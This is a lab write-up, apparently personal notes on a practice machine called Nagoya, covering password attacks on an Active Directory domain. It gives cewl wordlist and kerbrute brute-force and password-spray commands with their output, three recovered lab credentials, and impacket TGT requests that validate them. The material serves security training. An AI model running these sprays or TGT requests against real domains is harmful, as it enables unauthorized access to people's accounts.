InfoSec LAB

Nagoya_Password_Spray

Created: 3 min read

Password

Although a large number of valid domain users have been discovered and validated, no credential is known at this time.

Cewl

The /index page contains many words that are relevant to the target organization’s operations, which could potentially be linked to a user’s password

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ cewl http://$IP/index -d 0 -m 7 --with-numbers -w wordlist.txt
CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

Generating a wordlist off the /index page

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ cat ./users.txt | while read -r user; do kerbrute bruteuser --dc nagoya.nagoya-industries.com -d NAGOYA-INDUSTRIES.COM ./wordlist.txt "$user"; done

All failed

Solution

The solution turned out to be rather an unrealistic expectation. It’s claimed that people tend to use their favorite season or location alongside the year as password;

  • <SEASON>+<YEAR>
  • <LOCATION>+<YEAR>

The year is 2023 and It’s in Nagoya

Password Spray

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ kerbrute passwordspray --dc nagoya.nagoya-industries.com -d NAGOYA-INDUSTRIES.COM ./users.txt "Nagoya2023"     
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 04/23/25 - Ronnie Flathers @ropnop
 
2025/04/23 18:06:52 >  Using KDC(s):
2025/04/23 18:06:52 >  	nagoya.nagoya-industries.com:88
 
2025/04/23 18:06:52 >  [+] VALID LOGIN:	 andrea.hayes@NAGOYA-INDUSTRIES.COM:Nagoya2023
2025/04/23 18:06:52 >  Done! Tested 28 logins (1 successes) in 0.234 seconds

Performing a password spray attack with the password, Nagoya2023, was successful. It belongs to the andrea.hayes user

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ kerbrute passwordspray --dc nagoya.nagoya-industries.com -d NAGOYA-INDUSTRIES.COM ./users.txt "Summer2023"
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 04/23/25 - Ronnie Flathers @ropnop
 
2025/04/23 18:08:30 >  Using KDC(s):
2025/04/23 18:08:30 >  	nagoya.nagoya-industries.com:88
 
2025/04/23 18:08:30 >  [+] VALID LOGIN:	 fiona.clark@NAGOYA-INDUSTRIES.COM:Summer2023
2025/04/23 18:08:30 >  Done! Tested 28 logins (1 successes) in 0.203 seconds
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ kerbrute passwordspray --dc nagoya.nagoya-industries.com -d NAGOYA-INDUSTRIES.COM ./users.txt "Spring2023"
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 04/23/25 - Ronnie Flathers @ropnop
 
2025/04/23 18:08:36 >  Using KDC(s):
2025/04/23 18:08:36 >  	nagoya.nagoya-industries.com:88
 
2025/04/23 18:08:36 >  [+] VALID LOGIN:	 craig.carr@NAGOYA-INDUSTRIES.COM:Spring2023
2025/04/23 18:08:37 >  Done! Tested 28 logins (1 successes) in 0.182 seconds

2 credentials were found additionally;

  • fiona.clark:Summer2023
  • craig.carr:Spring2023

Validation

Validating the credentials above by requesting for TGT

andrea.hayes User
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-getTGT NAGOYA-INDUSTRIES.COM/andrea.hayes@nagoya.nagoya-industries.com -dc-ip $IP          
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Nagoya2023
[*] Saving ticket in andrea.hayes@nagoya.nagoya-industries.com.ccache

Validated TGT generated for the andrea.hayes user

fiona.clark User
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-getTGT NAGOYA-INDUSTRIES.COM/fiona.clark@nagoya.nagoya-industries.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Summer2023
[*] Saving ticket in fiona.clark@nagoya.nagoya-industries.com.ccache

Validated TGT generated for the fiona.clark user

craig.carr User
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-getTGT NAGOYA-INDUSTRIES.COM/craig.carr@nagoya.nagoya-industries.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Spring2023
[*] Saving ticket in fiona.clark@nagoya.nagoya-industries.com.ccache

Validated TGT generated for the craig.carr user

Interactive Graph View

Backlinks